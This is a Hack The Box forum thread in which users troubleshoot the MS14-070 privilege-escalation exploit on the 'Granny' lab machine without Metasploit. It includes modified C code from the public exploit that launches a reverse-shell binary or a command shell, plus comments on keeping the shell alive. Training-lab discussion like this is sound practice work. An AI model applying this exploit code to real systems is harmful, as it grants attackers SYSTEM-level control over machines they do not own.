Granny privesc (MS14-070) WITHOUT meterpreter

aasaas
edited February 2018 in Exploits

Hi,

I try to pwn Granny again, without meterpreter. I'm stuck with privesc (MS14-070 : https://www.exploit-db.com/exploits/37755/).

I modify the exploit like this :

BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORMATION *processInformation)
{
        ZeroMemory (&startupInformation[0], sizeof (STARTUPINFO));
        startupInformation->cb = sizeof (STARTUPINFO);
        ZeroMemory (&processInformation[0], sizeof (PROCESS_INFORMATION));

        // Start the child process.
        return CreateProcess (
                NULL,                                                           // No module name (use command line)
                //"c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32",   // Start cmd.exe
                "c:\\Inetpub\\wwwroot\\revshell.exe",   // Start reverse shell

                NULL,                                                           // Process handle not inheritable
                NULL,                                                           // Thread handle not inheritable
                TRUE,                                                           // Set handle inheritance to TRUE
                0,                                                              // No creation flags
                NULL,                                                           // Use parent's environment block
                NULL,                                                           // Use parent's starting directory
                &startupInformation[0],                                         // Pointer to STARTUPINFO structure
                &processInformation[0]                                          // Pointer to PROCESS_INFORMATION structure
        );
}

When I execute this exploit from cmd.exe (or command shell from meterpreter), it spawns a reverse shell but dies just after. No matter what payload I use (meterpreter, windows_reverse_shell, ncat.exe, etc).

But, when I execute -f MS14-070.exe from meterpreter, it opens just fine.

How can I have the same behaviour than meterpreter's execute -f for cmd.exe ?

In this video, the user has the exact same problem (he finally managed to have reverse shell, but used meterpreter's execute -f command) :

aas

Comments

  • Hey man, I'm stucked at the same point. Did you find a way to solve it?

    Hack The Box

    Message me with 1) Problem description 2) What did you try so far? 3) Your ideas about next steps

    If you appreciate my help, please give me +1 respect
    https://www.hackthebox.eu/home/users/profile/57582

  • `cmd /K` or `start`
  • Hi,

    try this:

    
    BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORMATION *processInformation)
    {
            ZeroMemory (&startupInformation[0], sizeof (STARTUPINFO));
            startupInformation->cb = sizeof (STARTUPINFO);
            startupInformation->lpDesktop = "WinSta0\\Default";
            ZeroMemory (&processInformation[0], sizeof (PROCESS_INFORMATION));
    
            LPTSTR lpComspec;
            lpComspec= (LPTSTR) malloc(1024*sizeof(TCHAR));
            GetEnvironmentVariable("comspec", lpComspec, 1024); 
    
            return CreateProcess (
                    lpComspec,
                    NULL,
                    NULL,
                    NULL,
                    TRUE,
                    0,
                    NULL,
                    NULL,
                    &startupInformation[0],
                    &processInformation[0]
            );
    }
    

  • @hackerintshell that will only work if you have an interactive session, meaning remote desktop or at the actual keyboard. And it would only pop a console window, not actually run anything else.

    The issue is the /C, which closes the console as soon as the command has run, terminating any threads living in the background. /K will keep it open, along with any children it's started.
  • edited December 2019

    @scud78 I tried it now and it worked for me. The EoP was made in the same reverse shell.

  • @hackerintshell how? %comspec% is just cmd, and you're not passing any arguments.
  • @hackerintshell I just logged in to thank you, it works! :)

  • could you upload the binary ?

    peek

  • I've spent around 3 hours today fighting with this box without MSF. Like others, I'm heading toward the OSCP and am doing my best to avoid Metasploit.

    It can be done. My experience was buggy, the reverse shell would time out each time in under a minute. You need the churrasco exploit. The forum keeps blocking me if I try to give any more detail.

    image
    If I've helped get you in the right direction, please give a little respect. Thanks!
    Or, hodor hodor hodor hodor hodor hodor hodor hodor hodor, hodor hodor hodor hodor hodor. Hodor!

Sign In to comment.